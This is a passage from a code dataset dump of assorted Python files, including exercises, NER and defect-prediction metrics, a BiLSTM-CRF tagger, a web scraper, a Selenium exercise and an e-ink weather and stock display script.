cap.release()\n vid_writer.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AFei19911012/PythonSamples","sub_path":"yolov5/yolov5_tracker.py","file_name":"yolov5_tracker.py","file_ext":"py","file_size_in_byte":4943,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"18"}
+{"seq_id":"71210623079","text":"import sys\nimport os\nimport os.path\nimport subprocess\nimport re\n\nfrom cpc.lib.gromacs import cmds\n\ndef checkTrajectory(filename):\n \"\"\"Check an existing trajectory and return the trajectory time in ns, \n the delta t, and the number of frames\"\"\"\n cmdnames = cmds.GromacsCommands()\n proc=subprocess.Popen(cmdnames.gmxcheck.split() + [\"-f\", filename],\n stdin=None,\n stderr=subprocess.STDOUT,\n stdout=subprocess.PIPE)\n ret=proc.communicate()\n step=re.compile('^Step\\s*([0-9]*)\\s*([0-9]*)', re.MULTILINE)\n if proc.returncode != 0: \n sys.stderr.write('pwd= %s\\n'%os.getcwd())\n sys.stderr.write('Got: %s\\n'%(unicode(ret[0], errors=\"ignore\")))\n match=step.search(ret[0])\n frames=int(match.group(1))\n dt=float(match.group(2))\n ns=(frames-1)*dt/1000.\n sys.stderr.write(\"Using trajectory %s with %g ns of trajectories\\n\"%\n (filename, ns))\n # return the time in ns\n return (ns, dt, frames)\n\n\n\n","repo_name":"gromacs/copernicus","sub_path":"cpc/lib/msm/check_traj.py","file_name":"check_traj.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"18"}
+{"seq_id":"31599944137","text":"filename = input(\"Enter file name: \")\nfileholder = open(filename)\ncount = 0\nemails = {}\nfor line in fileholder:\n nline = line.rstrip()\n if 'From' in nline and not \"From:\" in nline:\n lsplit = nline.split()\n emails[lsplit[1]] = emails.get(lsplit[1], 0) + 1\n else:\n continue\n\nbcount = None\nbemail = None\n\nfor email,occurrences in emails.items():\n if bcount is None or occurrences > bcount:\n bemail = email\n bcount = occurrences\n\nprint(bemail, bcount)\n","repo_name":"VerisimilitudeX/Python-For-Everybody--Python-Data-Structures-Certification","sub_path":"Assignment 9.4.py","file_name":"Assignment 9.4.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"70341721960","text":"import MySQLdb\r\ntry:\r\n db=MySQLdb.connect(\"192.168.3.188\",\"training\",\"training@123\",\"int_b6\")\r\n # print(\"success\")\r\n cursor = db.cursor()\r\n cursor.execute(\"SELECT VERSION()\")\r\n data=cursor.fetchall()\r\n print(data)\r\n db.close()\r\nexcept:\r\n print(\"error\")\r\n","repo_name":"arjun2038/Python-Basic-Programming","sub_path":"DataBase/Connection.py","file_name":"Connection.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"21193555488","text":"import numpy as np\n\n\ndef subtract_smooth(x, y):\n resized_y = y.copy()\n resized_y.resize(x.shape)\n y_new = resized_y - median_filter(x, resized_y, 1.)\n return y_new\n\n\ndef median_filter(x, y, width):\n # Error: IndexError: boolean index did not match indexed array along dimension 0; dimension is 4 but\n # corresponding boolean dimension is 5\n # I searched in google about 'boolean index did not match indexed array along dimension'\n # I noticed that y_new has the same shape as y, but in this case x has another shape\n # The calculation inside the y brackets returns an array of booleans that has a different shape than y\n # Maybe we can fill with zeros the smallest array in order to keep all the data points but I'm not sure\n y_new = np.zeros(y.shape)\n for i in range(len(x)):\n y_new[i] = np.median(y[np.abs(x - x[i]) < width * 0.5])\n return y_new\n\n\nprint(subtract_smooth(np.array([1, 2, 3, 4, 5]), np.array([4, 5, 6, 8])))\n","repo_name":"kevinszuchet/itc-fellows-part-time","sub_path":"pre_course/ex10_subtract_smooth.py","file_name":"ex10_subtract_smooth.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"70569468840","text":"# coding Statement: Write a program to find Sum of digits of a number\r\n\r\n# Description\r\n\r\n# Get a number from user and then find the sum of the digits in the given number.\r\n\r\n# E.g. let the number = 341\r\n\r\n# Sum of digits is 3+4+1= 8\r\n\r\n# Input :4521\r\n\r\n# Output :12\r\n\r\nn=int(input(\"Enter your number : \"))\r\nnum=str(n)\r\nsum=0\r\nfor i in num:\r\n sum=sum+int(i)\r\nprint(\"sum :\",sum)","repo_name":"Raviteja0524/Python_50","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"22171671602","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport itertools\nfrom sklearn.metrics import confusion_matrix, f1_score\nimport torch\nimport torch.autograd as autograd\nimport torch.nn as nn\nimport torch.optim as optim\nfrom utils.skseq.sequences.sequence import Sequence\n\n\ndef evaluate_corpus(sequences, sequences_predictions):\n \"\"\"Evaluate classification accuracy at corpus level, comparing with\n gold standard.\"\"\"\n total = 0.0\n correct = 0.0\n for i, sequence in enumerate(sequences):\n pred = sequences_predictions[i]\n for j, y_hat in enumerate(pred.y):\n if sequence.y[j] != 0: #0 is the index of the \"O\" tag\n if sequence.y[j] == y_hat:\n correct += 1\n total += 1\n return correct / total\n\n\ndef show_confusion_matrix(sequences, preds, sp=None, hmm=False, normalize=False, positions=None, labels=None):\n if hmm:\n y_true = [item for sublist in sequences for item in sublist]\n y_pred = [item for sublist in preds for item in sublist]\n else:\n y_true = []\n y_pred = []\n for seq, pred in zip(sequences, preds):\n y_true.extend(seq.y)\n y_pred.extend(pred.y.tolist())\n\n cm = confusion_matrix(y_true, y_pred)\n\n threshold = 24953\n cm_clipped = np.clip(cm, a_min=0, a_max=threshold)\n\n plt.figure(figsize=(10, 10))\n plt.imshow(cm_clipped, interpolation='nearest', cmap=plt.get_cmap('Blues'))\n plt.title(\"Confusion matrix\")\n #plt.colorbar()\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n\n thresh = threshold / 1.5 if normalize else threshold / 2\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n if normalize:\n plt.text(j, i, \"{:0.4f}\".format(cm[i, j]),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n else:\n plt.text(j, i, \"{:,}\".format(cm[i, j]),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n if (positions==None) | (labels==None):\n positions = list(sp.state_labels.values())\n labels = list(sp.state_labels.keys())\n\n plt.xticks(positions, labels)\n plt.yticks(positions, labels)\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.show()\n\n\ndef get_f1_score(sequences, preds, hmm=False):\n if hmm:\n y_true = [item for sublist in sequences for item in sublist]\n y_pred = [item for sublist in preds for item in sublist]\n else:\n y_true = []\n y_pred = []\n for seq, pred in zip(sequences, preds):\n y_true.extend(seq.y)\n y_pred.extend(pred.y.tolist())\n\n return f1_score(y_true, y_pred, average='weighted')\n\n\ndef tiny_test(model, train_seq=None, hmm=False, state_to_pos=None, decode=\"viterbi\"):\n\n sentences = [\n \"The programmers from Barcelona might write a sentence without a spell checker.\",\n \"The programmers from Barchelona cannot write a sentence without a spell checker.\",\n \"Jack London went to Parris.\",\n \"Jack London went to Paris.\",\n \"Bill gates and Steve jobs never though Microsoft would become such a big company.\",\n \"Bill Gates and Steve Jobs never though Microsof would become such a big company.\",\n \"The president of U.S.A though they could win the war.\",\n \"The president of the United States of America though they could win the war.\",\n \"The king of Saudi Arabia wanted total control.\",\n \"Robin does not want to go to Saudi Arabia.\",\n \"Apple is a great company.\",\n \"I really love apples and oranges.\",\n \"Alice and Henry went to the Microsoft store to buy a new computer during their trip to New York.\"\n ]\n \n y_pred = []\n if hmm:\n for p in sentences:\n pred = model.predict_labels(p.split())\n seq = Sequence(x=p.split(), y=pred)\n print(seq, '\\n') \n y_pred.extend(pred)\n y_pred = [state_to_pos[w] for w in y_pred]\n else:\n preds = []\n for p in sentences:\n seq = Sequence(x=p.split(), y=[int(0) for w in p.split()])\n if decode==\"viterbi\":\n pred = model.viterbi_decode(seq)[0]\n else: #to check if posterior decode works better\n pred = model.posterior_decode(seq)\n preds.append(pred)\n y_pred.extend(pred.y.tolist())\n print(pred.to_words(train_seq, only_tag_translation=True), '\\n')\n\n # evaluate results\n y_true = [0,0,0,1,0,0,0,0,0,0,0,0] + [0,0,0,0,0,0,0,0,0,0,0,0]\n y_true += [6,7,0,0,0] + [6,7,0,0,1]\n y_true += [6,7,0,6,7,0,0,4,0,0,0,0,0,0] + [6,7,0,6,7,0,0,0,0,0,0,0,0,0]\n y_true += [0,0,0,1,0,0,0,0,0,0] + [0,0,0,0,1,5,5,5,0,0,0,0,0,0]\n y_true += [0,0,0,1,5,0,0,0] + [6,0,0,0,0,0,0,1,5]\n y_true += [4,0,0,0,0] + [0,0,0,0,0,0]\n y_true += [6,0,6,0,0,0,4,0,0,0,0,0,0,0,0,0,0,1,5]\n\n correct = total = 0\n for y, y_hat in zip(y_true, y_pred):\n if y != 0: #0 is the index of the \"O\" tag\n if y == y_hat:\n correct += 1\n total += 1\n print(\"\\n===============================\")\n print(f\"Accuracy in TINY TEST = {round(correct/total, 4)}\")\n print(\"===============================\")\n\n\n\nclass BiLSTM_CRF_v2(nn.Module):\n\n def __init__(self, vocab_size, tag_to_ix, embedding_dim, hidden_dim):\n super(BiLSTM_CRF_v2, self).__init__()\n self.embedding_dim = embedding_dim\n self.hidden_dim = hidden_dim\n self.vocab_size = vocab_size\n self.tag_to_ix = tag_to_ix\n self.tagset_size = len(tag_to_ix)\n\n self.word_embeds = nn.Embedding(vocab_size, embedding_dim)\n self.lstm = nn.LSTM(embedding_dim, hidden_dim // 2,\n num_layers=1, bidirectional=True)\n\n # Maps the output of the LSTM into tag space.\n self.hidden2tag = nn.Linear(hidden_dim, self.tagset_size)\n\n # Matrix of transition parameters. Entry i,j is the score of\n # transitioning *to* i *from* j.\n self.transitions = nn.Parameter(\n torch.randn(self.tagset_size, self.tagset_size))\n\n # These two statements enforce the constraint that we never transfer\n # to the start tag and we never transfer from the stop tag\n self.transitions.data[tag_to_ix[START_TAG], :] = -10000\n self.transitions.data[:, tag_to_ix[STOP_TAG]] = -10000\n\n\n self.hidden = self.init_hidden()\n\n def init_hidden(self):\n return (torch.randn(2, 1, self.hidden_dim // 2),\n torch.randn(2, 1, self.hidden_dim // 2))\n\n def _forward_alg(self, feats):\n # Do the forward algorithm to compute the partition function\n init_alphas = torch.full((1, self.tagset_size), -10000.)\n # START_TAG has all of the score.\n init_alphas[0][self.tag_to_ix[START_TAG]] = 0.\n\n # Wrap in a variable so that we will get automatic backprop\n forward_var = init_alphas\n forward_var = forward_var\n\n # Iterate through the sentence\n for feat in feats:\n alphas_t = [] # The forward tensors at this timestep\n for next_tag in range(self.tagset_size):\n # broadcast the emission score: it is the same regardless of\n # the previous tag\n emit_score = feat[next_tag].view(\n 1, -1).expand(1, self.tagset_size)\n # the ith entry of trans_score is the score of transitioning to\n # next_tag from i\n trans_score = self.transitions[next_tag].view(1, -1)\n # The ith entry of next_tag_var is the value for the\n # edge (i -> next_tag) before we do log-sum-exp\n next_tag_var = forward_var + trans_score + emit_score\n # The forward variable for this tag is log-sum-exp of all the\n # scores.\n alphas_t.append(log_sum_exp(next_tag_var).view(1))\n forward_var = torch.cat(alphas_t).view(1, -1)\n terminal_var = forward_var + self.transitions[self.tag_to_ix[STOP_TAG]]\n alpha = log_sum_exp(terminal_var)\n return alpha\n\n def _get_lstm_features(self, sentence):\n self.hidden = self.init_hidden()\n embeds = self.word_embeds(sentence).view(len(sentence), 1, -1)\n lstm_out, self.hidden = self.lstm(embeds, self.hidden)\n lstm_out = lstm_out.view(len(sentence), self.hidden_dim)\n lstm_feats = self.hidden2tag(lstm_out)\n return lstm_feats\n\n def _score_sentence(self, feats, tags):\n # Gives the score of a provided tag sequence\n score = torch.zeros(1)\n tags = torch.cat([torch.tensor([self.tag_to_ix[START_TAG]], dtype=torch.long), tags])\n for i, feat in enumerate(feats):\n score = score + \\\n self.transitions[tags[i + 1], tags[i]] + feat[tags[i + 1]]\n score = score + self.transitions[self.tag_to_ix[STOP_TAG], tags[-1]]\n return score\n\n def _viterbi_decode(self, feats):\n backpointers = []\n\n # Initialize the viterbi variables in log space\n init_vvars = torch.full((1, self.tagset_size), -10000.)\n init_vvars[0][self.tag_to_ix[START_TAG]] = 0\n\n # forward_var at step i holds the viterbi variables for step i-1\n forward_var = init_vvars\n for feat in feats:\n bptrs_t = [] # holds the backpointers for this step\n viterbivars_t = [] # holds the viterbi variables for this step\n\n for next_tag in range(self.tagset_size):\n # next_tag_var[i] holds the viterbi variable for tag i at the\n # previous step, plus the score of transitioning\n # from tag i to next_tag.\n # We don't include the emission scores here because the max\n # does not depend on them (we add them in below)\n next_tag_var = forward_var + self.transitions[next_tag]\n best_tag_id = argmax(next_tag_var)\n bptrs_t.append(best_tag_id)\n viterbivars_t.append(next_tag_var[0][best_tag_id].view(1))\n # Now add in the emission scores, and assign forward_var to the set\n # of viterbi variables we just computed\n forward_var = (torch.cat(viterbivars_t) + feat).view(1, -1)\n backpointers.append(bptrs_t)\n\n # Transition to STOP_TAG\n terminal_var = forward_var + self.transitions[self.tag_to_ix[STOP_TAG]]\n best_tag_id = argmax(terminal_var)\n path_score = terminal_var[0][best_tag_id]\n\n # Follow the back pointers to decode the best path.\n best_path = [best_tag_id]\n for bptrs_t in reversed(backpointers):\n best_tag_id = bptrs_t[best_tag_id]\n best_path.append(best_tag_id)\n # Pop off the start tag (we dont want to return that to the caller)\n start = best_path.pop()\n assert start == self.tag_to_ix[START_TAG] # Sanity check\n best_path.reverse()\n return path_score, best_path\n\n def neg_log_likelihood(self, sentence, tags):\n feats = self._get_lstm_features(sentence)\n forward_score = self._forward_alg(feats)\n gold_score = self._score_sentence(feats, tags)\n return forward_score - gold_score\n\n def forward(self, sentence): # dont confuse this with _forward_alg above.\n # Get the emission scores from the BiLSTM\n lstm_feats = self._get_lstm_features(sentence)\n\n # Find the best path, given the features.\n score, tag_seq = self._viterbi_decode(lstm_feats)\n return score, tag_seq\n\n\ndef argmax(vec):\n # return the argmax as a python int\n _, idx = torch.max(vec, 1)\n return idx.item()\n\n\ndef prepare_sequence(seq, to_ix):\n idxs = [to_ix[w] for w in seq]\n return torch.tensor(idxs, dtype=torch.long)\n\n\n# Compute log sum exp in a numerically stable way for the forward algorithm\ndef log_sum_exp(vec):\n max_score = vec[0, argmax(vec)]\n max_score_broadcast = max_score.view(1, -1).expand(1, vec.size()[1])\n return max_score + \\\n torch.log(torch.sum(torch.exp(vec - max_score_broadcast)))\n","repo_name":"pabloac31/NLP-NER","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"72111216361","text":"import csv\nimport requests\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport os\nimport urllib.parse\nimport config\n\nrequest = urllib.request.Request(config.SCRAPE_LINK)\nresponse = urllib.request.urlopen(request)\nsoup = BeautifulSoup(response, \"html.parser\")\ndownloads_dir = os.path.dirname(os.path.abspath(__file__)) + '\\downloads'\n\nfor a in soup.findAll('a'):\n\tfilename = a['href'] \n\tfile_path = os.path.join(downloads_dir, filename)\n\t\n\tif not os.path.isfile(file_path):\n\t\turl = config.BASE_FILE + filename\n\t\tpath = urllib.parse.urlparse(url).path\n\t\text = os.path.splitext(path)[1]\n\t\tif ext in config.FILE_TYPES:\n\t\t\tfile = urllib.request.urlopen(url)\n\t\t\toutput = open(os.path.join(file_path),'wb')\n\t\t\toutput.write(file.read())\n\t\t\toutput.close()\n\t\t\tprint('Downloaded and Placed in /downloads: ' + filename)\n\telse:\n\t\tprint (filename + \" already located in downloads directory.\")\n","repo_name":"ishakm/scraper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"18614733102","text":"import time\nimport math\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport pyperclip\nimport os\ncurrent_dir = os.path.abspath(os.path.dirname(__file__))\nfile_path = os.path.join(current_dir, '1.txt')\n\n\ndef calc(x):\n return str(math.log(abs(12*math.sin(int(x)))))\n\n\nlink = \"http://suninjuly.github.io/file_input.html\"\n\nwith webdriver.Chrome() as browser:\n browser.get(link)\n browser.find_element(By.CSS_SELECTOR, \"[placeholder='Enter first name']\").send_keys(\"Ivan\")\n browser.find_element(By.CSS_SELECTOR, \"[placeholder='Enter last name']\").send_keys(\"Petrov\")\n browser.find_element(By.CSS_SELECTOR, \"[placeholder='Enter email']\").send_keys(\"Petrov@mail.ru\")\n\n browser.find_element(By.CSS_SELECTOR, \"[id='file']\").send_keys(file_path)\n browser.find_element(By.CLASS_NAME, \"btn-primary\").click()\n\n alert = browser.switch_to.alert\n addToClipBoard = alert.text.split(': ')[-1]\n pyperclip.copy(addToClipBoard)\n","repo_name":"Arzamasov-Zakhar/-stepik_auto_tests_course","sub_path":"2.2.8.py","file_name":"2.2.8.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"36063730135","text":"# -*- codeing = utf-8 -*-\n# @Time : 2023-8-30 23:07\n# @Author : 刘永奇\n# @File : 84. 柱状图中最大的矩形.py\n# @Software : PyCharm\nclass Solution:\n def largestRectangleArea(self, heights: List[int]) -> int:\n s = []\n l = [-1] * len(heights)\n r = [len(heights)] * len(heights)\n\n for i in range(len(heights)):\n while len(s) != 0 and heights[i] <= heights[s[-1]]:\n r[s[-1]] = i\n s.pop()\n if len(s) != 0:\n l[i] = s[-1]\n s.append(i)\n res = 0\n for i in range(len(heights)):\n res = max(res, (heights[i] * (r[i] - l[i] - 1)))\n return res\n","repo_name":"xs-web-lyq/LeetCode","sub_path":"Python/84. 柱状图中最大的矩形.py","file_name":"84. 柱状图中最大的矩形.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"70674562919","text":"from sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import auc\nimport math\nimport numpy as np\n\n\ndef get_confusion_matrix(y_true, y_pred) -> tuple:\n \"\"\"\n Returns tp, tn, fp, fn\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: (tp, tn, fp, fn)\n \"\"\"\n tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()\n return tp, tn, fp, fn\n\n\ndef get_accuracy(y_true, y_pred) -> float:\n \"\"\"\n Returns the accuracy score\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: Accuracy score\n \"\"\"\n # We need to cast to np.array so that .shape exists\n if isinstance(y_true, list):\n y_true = np.array(y_true)\n if isinstance(y_pred, list):\n y_pred = np.array(y_pred)\n\n if len(y_true.shape) > 1:\n y_true = y_true.argmax(axis=1)\n if len(y_pred.shape) > 1:\n y_pred = y_pred.argmax(axis=1)\n\n return accuracy_score(y_true, y_pred)\n\n\ndef get_f1_score(y_true, y_pred) -> float:\n \"\"\"\n Returns the F-1 score\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: F-1 score\n \"\"\"\n if len(np.unique(y_true)) > 2:\n average = None\n else:\n average = 'binary'\n return f1_score(y_true, y_pred, average=average)\n\n\ndef get_recall(y_true, y_pred) -> float:\n \"\"\"\n Returns the recall score\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: Recall score\n \"\"\"\n if len(np.unique(y_true)) > 2:\n average = None\n else:\n average = 'binary'\n return recall_score(y_true, y_pred, average=average)\n\n\ndef get_precision(y_true, y_pred) -> float:\n \"\"\"\n Returns the precision.\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: Precision\n \"\"\"\n if len(np.unique(y_true)) > 2:\n average = None\n else:\n average = 'binary'\n return precision_score(y_true, y_pred, average=average)\n\n\ndef get_pf(y_true, y_pred) -> float:\n \"\"\"\n Returns the false alarm rate\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: False alarm rate\n \"\"\"\n _, tn, fp, fn = get_confusion_matrix(y_true, y_pred)\n return 1. * fp / (fp + tn) if fp + tn != 0 else 0\n\n\ndef get_pd_pf(y_true, y_pred) -> float:\n \"\"\"\n Returns the value of recall - false alarm rate.\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: Recall - false alarm rate\n \"\"\"\n return get_recall(y_true, y_pred) - get_pf(y_true, y_pred)\n\n\ndef get_roc_auc(y_true, y_pred) -> float:\n \"\"\"\n Returns the area under the pd/pf curve\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: AUC score\n \"\"\"\n return roc_auc_score(y_true, y_pred)\n\n\ndef get_d2h(y_true, y_pred) -> float:\n \"\"\"\n Returns the distance to heaven metric\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: d2h score\n \"\"\"\n return 1. / math.sqrt(2) - math.sqrt(get_pf(y_true, y_pred) ** 2 + (1. - get_recall(y_true, y_pred)) ** 2) / math.sqrt(2)\n\n\ndef get_d2h2(y_true, y_pred) -> float:\n \"\"\"\n Returns the distance to heaven metric\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: d2h score\n \"\"\"\n return 1. / math.sqrt(2) - math.sqrt(2.*get_pf(y_true, y_pred) ** 2 + (1. - get_recall(y_true, y_pred)) ** 2) / math.sqrt(2)\n\n\ndef get_ifa(y_true, y_pred) -> float:\n ifa = 0\n actual_results = np.asarray(y_true)\n predicted_results = np.asarray(y_pred)\n index = 0\n for i, j in zip(actual_results, predicted_results):\n if ((i == \"yes\") and (j == \"yes\")) or ((i == 1) and (j == 0)):\n break\n elif ((i == \"no\") and (j == \"yes\")) or ((i == 0) and (j == 1)):\n ifa += 1\n index += 1\n return ifa\n\n\ndef get_g1_score(y_true, y_pred) -> float:\n \"\"\"\n Returns the G-1 score\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: G-1 score\n \"\"\"\n tp, tn, fp, fn = get_confusion_matrix(y_true, y_pred)\n pf = 1. * fp / (fp + tn) if fp + tn != 0 else 0\n recall = 1. * tp / (tp+fn) if tp + fn != 0 else 0\n g_score = (2 * recall * (1 - pf)) / (recall + 1 - pf) if recall + 1 - pf != 0 else 0\n return g_score\n\n\ndef get_popt20(data) -> float:\n \"\"\"\n Get popt20 score.\n\n :param data: Pandas DataFrame with data. Must contain columns \"bug\", \"loc\", and \"prediction\".\n :return: popt20 score\n \"\"\"\n def subtotal(x):\n xx = [0]\n for _, t in enumerate(x):\n xx += [xx[-1] + t]\n return xx[1:]\n\n def get_recall_(true):\n total_true = float(len([i for i in true if i == 1]))\n hit = 0.0\n recall = []\n for i, el in enumerate(true):\n if el == 1:\n hit += 1\n recall += [hit / total_true if total_true else 0.0]\n return recall\n\n data.sort_values(by=[\"bug\", \"loc\"], inplace=True)\n x_sum = float(sum(data['loc']))\n x = data['loc'].apply(lambda t: t / x_sum)\n xx = subtotal(x)\n\n # get AUC_optimal\n yy = get_recall_(data['bug'].values)\n xxx = [i for i in xx if i <= 0.2]\n yyy = yy[:len(xxx)]\n try:\n s_opt = round(auc(xxx, yyy), 3)\n except ValueError:\n s_opt = 0\n\n # get AUC_worst\n xx = subtotal(x[::-1])\n yy = get_recall_(data['bug'][::-1].values)\n xxx = [i for i in xx if i <= 0.2]\n yyy = yy[:len(xxx)]\n try:\n s_wst = round(auc(xxx, yyy), 3)\n except:\n s_wst = 0\n\n # get AUC_prediction\n data.sort_values(by=[\"prediction\", \"loc\"], ascending=[0, 1], inplace=True)\n x = data['loc'].apply(lambda t: t / x_sum)\n xx = subtotal(x)\n yy = get_recall_(data['bug'].values)\n xxx = [k for k in xx if k <= 0.2]\n yyy = yy[:len(xxx)]\n try:\n s_m = round(auc(xxx, yyy), 3)\n except ValueError:\n return 0\n\n popt = (s_m - s_wst) / (s_opt - s_wst)\n return round(popt, 3)\n","repo_name":"yrahul3910/raise","sub_path":"raise_utils/metrics/impl.py","file_name":"impl.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"22284175474","text":"#!/usr/bin/env python\n#encoding: utf-8\nimport sys\nimport os\nimport time\nimport datetime\nimport json\nimport requests\nimport re\nimport struct\nfrom StringIO import StringIO\nfrom PIL import Image, ImageDraw, ImageFont\n\ncolor_white = (255, 255, 255)\ncolor_black = (0, 0, 0)\ncolor_red = (227, 178, 4)\n\nimage_width = 640\nimage_height = 384\n\nfont_path = os.path.dirname(os.path.abspath(__file__)) + '/font.ttc'\n\ndef current_datetime():\n m = ['一', '二', '三', '四', '五', '六', '日']\n n = datetime.datetime.now()\n return (n.strftime('%m-%d %H:%M 星期') + m[n.weekday()]).decode('utf-8')\n\ndef fetch_finance():\n url = 'https://hq.sinajs.cn/rn=%d&list=gb_dji,gb_ixic,gb_inx,s_sh000001,s_sz399001,USDCNY' % int(time.time())\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',\n }\n r = requests.get(url, headers=headers)\n text = r.text\n matches = re.findall(r'var ([^=]+)=\"([^\"]+)\"', text, re.M)\n\n result = {}\n for v in matches:\n result[v[0]] = v[1].split(',')\n\n return result\n\ndef draw_finance(draw, item, pos):\n font = ImageFont.truetype(font_path, 20)\n\n left = pos[0]\n top = pos[1] + 10\n text = item[0]\n draw.text((left, top), text, font=font, fill=color_black)\n w, h = draw.textsize(text, font=font)\n w2, h2 = draw.textsize(u'四个字符', font=font)\n if w < w2:\n w = w2\n\n left += w + 10\n text = u'%.2f' % item[1]\n w, h = draw.textsize(text, font=font)\n draw.text((left, top), text, font=font, fill=color_black)\n\n bg_color = None\n txt_color = None\n left += w + 10\n\n if item[2] > 0:\n bg_color = color_red\n txt_color = color_black\n text = u'+%.2f%%' % item[2]\n else:\n bg_color = color_black\n txt_color = color_white\n text = u'-%f%' % item[2]\n\n w, h = draw.textsize(text, font=font)\n draw.rectangle([left-2, top-2, left + w + 2, top + h + 2], fill=bg_color)\n draw.text((left, top), text, font=font, fill=txt_color)\n\ndef load_icon(url):\n r = requests.get(url)\n png = Image.open(StringIO(r.content))\n background = Image.new(\"RGB\", png.size, (255, 255, 255))\n background.paste(png, mask=png.split()[3]) # 3 is the alpha channel\n return background\n\ndef draw_weather(image, draw, day, pos, width):\n is_today = datetime.datetime.now().strftime('%m-%d') == day['date']\n\n font = ImageFont.truetype(font_path, 24)\n\n left = pos[0]\n top = pos[1] + 10\n text = day['date']\n w, h = draw.textsize(text, font=font)\n draw.text(((width-w)/2 + left, top), text, font=font, fill=color_black)\n\n top += h + 5\n text = day['weekday']\n w, h = draw.textsize(text, font=font)\n draw.text(((width-w)/2 + left, top), text, font=font, fill=color_black)\n\n top += h + 5\n if is_today:\n icon = load_icon(day['day']['icon'])\n icon_margin = (width - icon.size[0])/2\n image.paste(icon, (icon_margin + left, top))\n else:\n icon = load_icon(day['day']['icon'])\n icon_margin = width/2 - icon.size[0] - 10\n image.paste(icon, (icon_margin + left, top))\n\n icon = load_icon(day['night']['icon'])\n image.paste(icon, (left + width/2 + 10, top))\n\n font = ImageFont.truetype(font_path, 20)\n text = day['day']['temp'] + u'℃'\n if not is_today:\n text += ' / ' + day['night']['temp'] + u'℃'\n top += h + 30\n w, h = draw.textsize(text, font=font)\n draw.text(((width-w)/2 + left, top), text, font=font, fill=color_black)\n\n font = ImageFont.truetype(font_path, 16)\n text = day['wind']\n top += h + 5\n w, h = draw.textsize(text, font=font)\n draw.text(((width-w)/2 + left, top), text, font=font, fill=color_black)\n\n font = ImageFont.truetype(font_path, 24)\n text = day['aq'] + u' ' + day['aq_desc']\n top += h + 5\n w, h = draw.textsize(text, font=font)\n draw.text(((width-w)/2 + left, top), text, font=font, fill=color_black)\n\n\ndef draw_board():\n image = Image.new('RGB', (image_width, image_height), color_white)\n draw = ImageDraw.Draw(image)\n\n font = ImageFont.truetype(font_path, 60)\n\n line = current_datetime()\n w, h = draw.textsize(line, font=font)\n draw.text(((image_width-w)/2,10), line, font=font, fill=color_black)\n\n draw.line([(0, 80),(image_width, 80)], fill=color_black, width=1)\n\n json_path = os.path.dirname(os.path.abspath(__file__)) + '/weather.json'\n weather_info = json.load(open(json_path))\n weather_info['days'][0]['day']['temp'] = weather_info['current_temp']\n weather_info['days'][0]['wind'] = weather_info['current_wind']\n weather_info['days'][0]['aq'] = weather_info['current_aq']\n weather_info['days'][0]['aq_desc'] = weather_info['current_aq_desc']\n\n for i in xrange(4):\n width = image_width / 4\n draw_weather(image, draw, weather_info['days'][i], (0 + i * width, 80), width)\n if i != 3:\n draw.line([((i+1)*width, 80),((i+1)*width, 80+200)], fill=color_black, width=1)\n\n draw.line([(0, 80+200),(image_width, 80+200)], fill=color_black, width=1)\n\n finance = fetch_finance()\n draw_finance(draw, (u'道琼斯', float(finance['hq_str_gb_dji'][1]), float(finance['hq_str_gb_dji'][2])), (20, 280))\n draw_finance(draw, (u'纳斯达克', float(finance['hq_str_gb_ixic'][1]), 